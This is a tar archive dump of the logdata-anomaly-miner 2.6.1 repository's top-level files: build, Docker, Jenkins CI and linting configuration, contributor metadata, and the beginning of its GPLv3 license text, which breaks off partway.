pax_global_header00006660000000000000000000000064143760656010014522gustar00rootroot0000000000000052 comment=7a6677acf3bee55195629ef07faa67cefe563c6e logdata-anomaly-miner-2.6.1/000077500000000000000000000000001437606560100157115ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/.deepsource.toml000066400000000000000000000005261437606560100210250ustar00rootroot00000000000000version = 1 exclude_patterns = [ "aecid-testsuite/**", "source/root/etc/aminer/template_config.py", "source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/**" ] [[analyzers]] name = "python" enabled = true [analyzers.meta] runtime_version = "3.x.x" max_line_length = 140 [[analyzers]] name = "test-coverage" enabled = true logdata-anomaly-miner-2.6.1/.github/000077500000000000000000000000001437606560100172515ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/.github/pull_request_template.md000066400000000000000000000012661437606560100242170ustar00rootroot00000000000000# Make sure these boxes are signed before submitting your Pull Request -- thank you. # Must haves - [ ] I have read and followed the contributing guide lines at https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Git-development-workflow - [ ] Issues exist for this PR - [ ] I added related issues using the "Fixes #"-notations - [ ] This Pull-Requests merges into the "development"-branch Fixes # # Submission specific - [ ] This PR introduces breaking changes - [ ] My change requires a change to the documentation - [ ] I have updated the documentation accordingly - [ ] I have added tests to cover my changes - [ ] All new and existing tests passed # Describe changes: - logdata-anomaly-miner-2.6.1/.gitignore000066400000000000000000000043741437606560100177110ustar00rootroot00000000000000# Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class # vim *.swp # C extensions *.so # Distribution / packaging .Python build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ parts/ sdist/ var/ wheels/ share/python-wheels/ *.egg-info/ .installed.cfg *.egg MANIFEST # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. *.manifest *.spec # Installer logs pip-log.txt pip-delete-this-directory.txt # Unit test / coverage reports htmlcov/ .tox/ .nox/ .coverage .coverage.* .cache nosetests.xml coverage.xml *.cover *.py,cover .hypothesis/ .pytest_cache/ cover/ # Translations *.mo *.pot # Flask stuff: instance/ .webassets-cache # Scrapy stuff: .scrapy # Sphinx documentation _build docs/_build/ docs/Wiki docs/SECURITY.md docs/README.md docs/LICENSE.md #docker akafka/ aminercfg/ persistency/ logs/ # PyBuilder .pybuilder/ target/ # Jupyter Notebook .ipynb_checkpoints # IPython profile_default/ ipython_config.py # pyenv # For a library or package, you might want to ignore these files since the code is # intended to run in multiple environments; otherwise, check them in: # .python-version # pipenv # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. # However, in case of collaboration, if having platform-specific dependencies or dependencies # having no cross-platform support, pipenv may install dependencies that don't work, or not # install all needed dependencies. #Pipfile.lock # PEP 582; used by e.g. github.com/David-OConnor/pyflow __pypackages__/ # Celery stuff celerybeat-schedule celerybeat.pid # SageMath parsed files *.sage.py # Environments .env .venv env/ venv/ ENV/ env.bak/ venv.bak/ # PyCharm IDE .idea/ # Spyder project settings .spyderproject .spyproject # Rope project settings .ropeproject # mkdocs documentation /site # mypy .mypy_cache/ .dmypy.json dmypy.json # Pyre type checker .pyre/ # pytype static type analyzer .pytype/ # Cython debug symbols cython_debug/ # ignore ansible-roles roles/ playbook.yml playbook.retry # for testing aecid-testsuite/aminer aecid-testsuite/demo/aminer/template_config.py # Aminer Docker Volumes aminercfg/ persistency/ logs/ logdata-anomaly-miner-2.6.1/.playbook.yml000066400000000000000000000003161437606560100203320ustar00rootroot00000000000000# aminer-ansible: https://github.com/ait-aecid/aminer-ansible.git - hosts: localhost vars: aminer_gitrepo: False # MODIFY THIS PATH aminer_repopath: "{{SOURCEDIR}}" roles: - aminer logdata-anomaly-miner-2.6.1/.pre-commit-config.yaml000066400000000000000000000013311437606560100221700ustar00rootroot00000000000000# See https://pre-commit.com for more information # See https://pre-commit.com/hooks.html for more hooks repos: - repo: https://github.com/pre-commit/pre-commit-hooks rev: v3.2.0 hooks: - id: trailing-whitespace - id: end-of-file-fixer - id: check-yaml - id: check-added-large-files - repo: https://github.com/pre-commit/mirrors-mypy rev: v0.790 hooks: - id: mypy additional_dependencies: [pydantic] - repo: https://gitlab.com/pycqa/flake8 rev: 3.8.4 hooks: - id: flake8 args: [--max-line-length=140] - repo: https://github.com/pre-commit/mirrors-autopep8 rev: v1.7.0 hooks: - id: autopep8 args: [--max-line-length=140, --diff] logdata-anomaly-miner-2.6.1/AUTHORS000066400000000000000000000004451437606560100167640ustar00rootroot00000000000000Roman Fiedler Markus Wurzenberger Max Landauer Wolfgang Hotwagner Ernst Leierzopf Georg Hoeld Florian Skopik Daniel Klimas logdata-anomaly-miner-2.6.1/Build000077500000000000000000000042421437606560100167000ustar00rootroot00000000000000#!/bin/bash -e # Build script wrapper # # How to use: # # * Build package only in temporary location _tmpRoot, # use it also for storing of temporary files (which should be # removed before creating the package). The directory is deleted # at the end of the script. By using it that way, no garbage files # are left over after building and symlink attacks on temporary # directories are prevented. # # The script will place the new packages in the current working # directory, overwriting any existing files of same name. if [ "${EUID} ${UID}" = "0 0" ] && touch /fake-root-detect 2> /dev/null; then rm /fake-root-detect echo "Build should not be run as root!" >&2 exit 1 fi # Export tmp dir to allow large package builds within vservers export TMPDIR="/var/tmp" _projectDir="$(pwd)" # Use a temporary directory for building, no need to keep it. _tmpRoot="$(mktemp -d)" echo "Building package at ${_tmpRoot}" >&2 _debDirectory="${_tmpRoot}/deb-build" _tarVersion=$(head -1 debian/changelog | awk 'match($0, /\(.*\)/) { print substr($0, RSTART+1, RLENGTH-4) } ') mkdir -- "${_debDirectory}" cp -a -- "${_projectDir}/debian" "${_projectDir}/source/root" "${_debDirectory}" cp -a -- "${_projectDir}/README.md" "${_debDirectory}" fakeroot -- tar -C ${_debDirectory} -czf "${_tmpRoot}/logdata-anomaly-miner_${_tarVersion}.orig.tar.gz" --transform 's,^./,deb-build/,' . gpg -ab "${_tmpRoot}/logdata-anomaly-miner_${_tarVersion}.orig.tar.gz" # Build packages: # -F: full build # -us: unsigned sorce # -uc: unsigned changes # -sa: force inclusion of original source (set -e; cd -- "${_debDirectory}"; dpkg-buildpackage -S -us -uc -sa; dpkg-buildpackage -b -uc) rm -rf -- "${_debDirectory}" cp -a -- "${_tmpRoot}/logdata-anomaly-miner_"* . rm -rf -- "${_tmpRoot}" # Build the alienated package for CentOS/Redhat. _debFileName="$(ls -- logdata-anomaly-miner_*_all.deb)" _debVersion="$(echo "${_debFileName}" | sed -r -e 's/logdata-anomaly-miner_([0-9a-z.~-]+)_all.deb/\1/')" fakeroot -- /usr/bin/alien --to-rpm "${_debFileName}" mv -i -- "logdata-anomaly-miner-${_debVersion}-2.noarch.rpm" "logdata-anomaly-miner-${_debVersion}-2.noarch.alien.rpm" < /dev/null echo "Build successful" >&2 logdata-anomaly-miner-2.6.1/Dockerfile000066400000000000000000000104131437606560100177020ustar00rootroot00000000000000# logdata-anomaly-miner Dockerfile # # Use build-script to create docker: # scripts/build_docker.sh # # Build manually: # docker build -t aecid/logdata-anomaly-miner:latest -t aecid/logdata-anomaly-miner:$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') . # # See: https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Deployment-with-Docker # # Pull base image. FROM debian:bullseye ARG UNAME=aminer ARG UID=1000 ARG GID=1000 # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y \ supervisor \ python3 \ python3-pip \ python3-tz \ python3-scipy \ python3-pkg-resources \ python3-setuptools \ python3-dateutil \ python3-six \ python3-scipy \ python3-kafka \ python3-cerberus \ python3-yaml \ python3-pylibacl \ python3-urllib3 \ python3-statsmodels \ libacl1-dev # Docs RUN apt-get update && apt-get install -y \ python3-sphinx \ python3-sphinx-rtd-theme \ python3-recommonmark \ make # For Docs ADD docs /docs ADD README.md /docs ADD SECURITY.md /docs ADD LICENSE /docs/LICENSE.md # Copy logdata-anomaly-miner-sources ADD source/root/usr/lib/logdata-anomaly-miner /usr/lib/logdata-anomaly-miner # copy these files instead as symlinks would need absolute paths. ADD source/root/etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/generic/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/ait-lds /etc/aminer/conf-available/ait-lds ADD source/root/etc/aminer/conf-available/generic /etc/aminer/conf-available/generic # Entrypoint-wrapper ADD scripts/aminerwrapper.sh /aminerwrapper.sh # Prepare the system and link all python-modules RUN ln -s /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py /usr/bin/aminerremotecontrol \ && ln -s /usr/lib/logdata-anomaly-miner/aminer.py /usr/bin/aminer \ && chmod 0755 /usr/lib/logdata-anomaly-miner/aminer.py \ && chmod 0755 /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py \ && chmod 0755 /etc/aminer \ && ln -s /usr/lib/python3/dist-packages/kafka /usr/lib/logdata-anomaly-miner/kafka \ && ln -s /usr/lib/python3/dist-packages/cerberus /usr/lib/logdata-anomaly-miner/cerberus \ && ln -s /usr/lib/python3/dist-packages/scipy /usr/lib/logdata-anomaly-miner/scipy \ && ln -s /usr/lib/python3/dist-packages/numpy /usr/lib/logdata-anomaly-miner/numpy \ && ln -s /usr/lib/python3/dist-packages/pkg_resources /usr/lib/logdata-anomaly-miner/pkg_resources \ && ln -s /usr/lib/python3/dist-packages/yaml /usr/lib/logdata-anomaly-miner/yaml \ && ln -s /usr/lib/python3/dist-packages/pytz /usr/lib/logdata-anomaly-miner/pytz \ && ln -s /usr/lib/python3/dist-packages/dateutil /usr/lib/logdata-anomaly-miner/dateutil \ && ln -s /usr/lib/python3/dist-packages/six.py /usr/lib/logdata-anomaly-miner/six.py \ && ln -s /usr/lib/python3/dist-packages/urllib3 /usr/lib/logdata-anomaly-miner/urllib3 \ && ln -s /usr/lib/python3/dist-packages/statsmodels /usr/lib/logdata-anomaly-miner/statsmodels \ && groupadd -g $GID -o $UNAME && useradd -u $UID -g $GID -ms /usr/sbin/nologin $UNAME && mkdir -p /var/lib/aminer/logs \ && chown $UID.$GID -R /var/lib/aminer \ && chown $UID.$GID -R /docs \ && chmod 0755 /aminerwrapper.sh RUN PACK=$(find /usr/lib/python3/dist-packages -name posix1e.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE RUN pip3 install orjson RUN PACK=$(find /usr/local/lib/ -name orjson.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE # Prepare Supervisord COPY scripts/supervisord.conf /etc/supervisor/conf.d/supervisord.conf RUN mkdir /var/lib/supervisor && chown $UID.$GID -R /var/lib/supervisor \ && chown $UID.$GID -R /var/log/supervisor/ USER aminer WORKDIR /home/aminer # The following volumes can be mounted VOLUME ["/etc/aminer","/var/lib/aminer","/logs"] ENTRYPOINT ["/aminerwrapper.sh"] # Default command for the ENTRYPOINT(wrapper) CMD ["aminer","--config","/etc/aminer/config.yml"] logdata-anomaly-miner-2.6.1/Jenkinsfile000066400000000000000000000513511437606560100201020ustar00rootroot00000000000000void setBuildStatus(String message, String state) { step([ $class: "GitHubCommitStatusSetter", reposSource: [$class: "ManuallyEnteredRepositorySource", url: "https://github.com/ait-aecid/logdata-anomaly-miner"], contextSource: [$class: "ManuallyEnteredCommitContextSource", context: "ci/jenkins/build-status"], errorHandlers: [[$class: "ChangingBuildStatusErrorHandler", result: "UNSTABLE"]], statusResultSource: [ $class: "ConditionalStatusResultSource", results: [[$class: "AnyBuildResult", message: message, state: state]] ] ]); } def ubuntu18image = false def ubuntu20image = false def debianbusterimage = false def debianbullseyeimage = false def productionimage = false def docsimage = false pipeline { agent any stages { stage("Build Test-Container") { steps { sh "docker build -f aecid-testsuite/Dockerfile -t aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." } } stage("Static Analysis & Basic Functionality") { parallel { stage("Mypy"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runMypy" } } stage("Release String Check"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runReleaseStringCheck" } } stage("Suspend Mode"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runSuspendModeTest" } } stage("Remote Control"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runRemoteControlTest" } } stage("Integration Test 1"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerIntegrationTest aminerIntegrationTest.sh config.py" } } stage("Integration Test 2"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerIntegrationTest aminerIntegrationTest2.sh config21.py config22.py" } } stage("Offline Mode"){ steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runOfflineMode" } } } } stage("Unittests") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runUnittests" } } stage("Aminer Demo Tests") { parallel { stage("demo-config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/demo-config.py" } } stage("demo-config.yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/demo-config.yml" } } stage("jsonConverterHandler-demo-config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/jsonConverterHandler-demo-config.py" } } stage("template_config.py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/template_config.py" } } stage("template_config.yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerDemo demo/aminer/template_config.yml" } } stage("Encoding Demo .py") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerEncodingDemo demo/aminer/demo-config.py" } } stage("Encoding Demo .yml") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerEncodingDemo demo/aminer/demo-config.yml" } } } } stage("Json Input Tests") { parallel { stage("Json Input Demo") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runAminerJsonInputDemo" } } stage("Aminer") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-aminer-demo.yml" } } stage("Elastic") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-elastic-demo.yml" } } stage("Eve") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-eve-demo.yml" } } stage("Journal") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-journal-demo.yml" } } stage("Wazuh") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/json-wazuh-demo.yml" } } stage("Windows") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runJsonDemo demo/aminerJsonInputDemo/windows.yml" } } } } stage("System, Documentation and Wiki Tests") { parallel { stage("Available Configs") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runConfAvailableTest" } } stage("Debian Bullseye") { steps { script { debianbullseyeimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:bullseye ." sh "mkdir -p /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" /* the result of timeout is negated with "!". This is because aminer returns 1 if timeout stops the process and otherwise 0. The way around is a valid result for a test */ sh "cd /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && ! timeout -s INT --preserve-status 5 docker run -v $PWD/aminercfg:/etc/aminer -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -it aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Test Debian Buster") { steps { script { debianbusterimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=debian:buster ." sh "mkdir -p /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" /* the result of timeout is negated with "!". This is because aminer returns 1 if timeout stops the process and otherwise 0. The way around is a valid result for a test */ sh "cd /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && ! timeout -s INT --preserve-status 5 docker run -v $PWD/aminercfg:/etc/aminer -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -it aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Test Production Docker Image") { steps { script { productionimage = true } sh "docker build -f Dockerfile -t aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." sh "mkdir -p /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" /* the result of timeout is negated with "!". This is because aminer returns 1 if timeout stops the process and otherwise 0. The way around is a valid result for a test */ sh "cd /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && ! timeout -s INT --preserve-status 5 docker run -v $PWD/aminercfg:/etc/aminer -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -it aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Test Ubuntu 18.04") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script{ ubuntu18image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-ubuntu-1804:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=ubuntu:18.04 ." sh "docker run --rm aecid/aminer-ubuntu-1804:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } } stage("Test Ubuntu 20.04") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } steps { script { ubuntu20image = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_deb -t aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development --build-arg=vardistri=ubuntu:20.04 ." sh "docker run --rm aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } } stage("Build Documentation") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } environment { BUILDDOCSDIR = sh(script: 'mktemp -p $WORKSPACE_TMP -d | tr -d [:space:]', returnStdout: true) } steps { script { docsimage = true } sh "docker build -f Dockerfile -t aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." sh "chmod 777 ${env.BUILDDOCSDIR}" sh "chmod g+s ${env.BUILDDOCSDIR}" sh "docker run --rm -v ${env.BUILDDOCSDIR}:/docs/_build aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID mkdocs" sh "scripts/deploydocs.sh ${env.BRANCH_NAME} ${env.BUILDDOCSDIR}/html /var/www/aeciddocs/logdata-anomaly-miner" } } stage("Try It Out") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runTryItOut development" } } stage("Getting Started") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runGettingStarted development" } } stage("Sequence Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnSequenceDetector development" } } stage("Frequency Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnFrequencyDetector development" } } stage("MissingMatchPathDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToMissingMatchPathValueDetector development" } } stage("EntropyDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToEntropyDetector development" } } } } stage("Wiki Tests - main") { when { branch "main" } parallel { stage("Try It Out") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runTryItOut main" } } stage("Getting Started") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runGettingStarted main" } } stage("Sequence Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnSequenceDetector main" } } stage("Frequency Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnFrequencyDetector main" } } stage("MissingMatchPathDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToMissingMatchPathValueDetector main" } } } } } post { always { script { sh "docker rmi aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" if( debianbullseyeimage == true ) { sh "docker rmi aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( debianbusterimage == true ) { sh "docker rmi aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( productionimage == true ) { sh "docker rmi aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( ubuntu18image == true ) { sh "docker rmi aecid/aminer-ubuntu-1804:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( ubuntu20image == true ) { sh "docker rmi aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( docsimage == true){ sh "docker rmi aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } } } success { setBuildStatus("Build succeeded", "SUCCESS"); } failure { setBuildStatus("Build failed", "FAILURE"); } } } logdata-anomaly-miner-2.6.1/LICENSE000066400000000000000000001045131437606560100167220ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, 